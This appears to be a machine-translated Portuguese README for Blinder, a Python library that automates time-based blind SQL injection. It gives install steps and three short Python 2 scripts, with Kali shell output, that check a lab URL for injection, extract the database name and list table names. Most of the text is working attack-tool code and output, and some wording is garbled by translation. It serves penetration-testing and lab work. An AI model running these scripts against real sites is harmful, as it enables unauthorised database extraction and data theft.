O Blidner é uma pequena biblioteca python para automatizar a injeção SQL com base no tempo , usando consultas predefinidas como funções para automatizar um rápido desenvolvimento de PoC.
Instalação:
Você pode instalar o Blinder usando o seguinte comando:pip install blinder
Ou baixando a fonte e importando-a manualmente para o seu projeto.
Uso:
Para usarBlindero Blinder,você precisa importar omódulo e começar a usar as principais funções do Blinder.
Você pode usar o Blinder “com a versão atual” para fazer o seguinte:
- Verifique se há injeção baseada no tempo.
- Obtenha o nome do banco de dados.
- Obter nomes de tabelas.
Você pode verificar a injeção em uma URL usando o seguinte código:
#!/usr/bin/python
import Blinder
blind = Blinder.blinder(
"http://sqli-lab/sql_injection/index.php?search=3",
sleep=1
)
print blind.check_injection()
O resultado da execução será:
root@kali:~/Desktop# python check.py
True
root@kali:~/Desktop#Você pode obter o nome do banco de dados usando o seguinte código:
#!/usr/bin/python
import Blinder
blind = Blinder.blinder(
"http://sqli-lab/sql_injection/index.php?search=3",
sleep=1
)
print "Database name is : %s " % blind.get_database()
E os resultados serão:
root@kali:~/Desktop# python get-database.py
Database name is : db1
root@kali:~/Desktop#Para obter nomes de tabelas, você pode usar o seguinte código:
#!/usr/bin/python
import Blinder
blind = Blinder.blinder(
"http://sqli-lab/sql_injection/index.php?search=3",
sleep=1
)
tables = blind.get_tables()
for table in tables:
print table
E os resultados serão:
root@kali:~/Desktop# python get-tables.py
blogs
notes
root@kali:~/Desktop#TODO
Muitos recursos devem ser adicionados em breve, como:
- a capacidade de adicionar consulta personalizada
- pontos de injeção de teste com base na solicitação de arroto
- extrair dados de tabelas / colunas
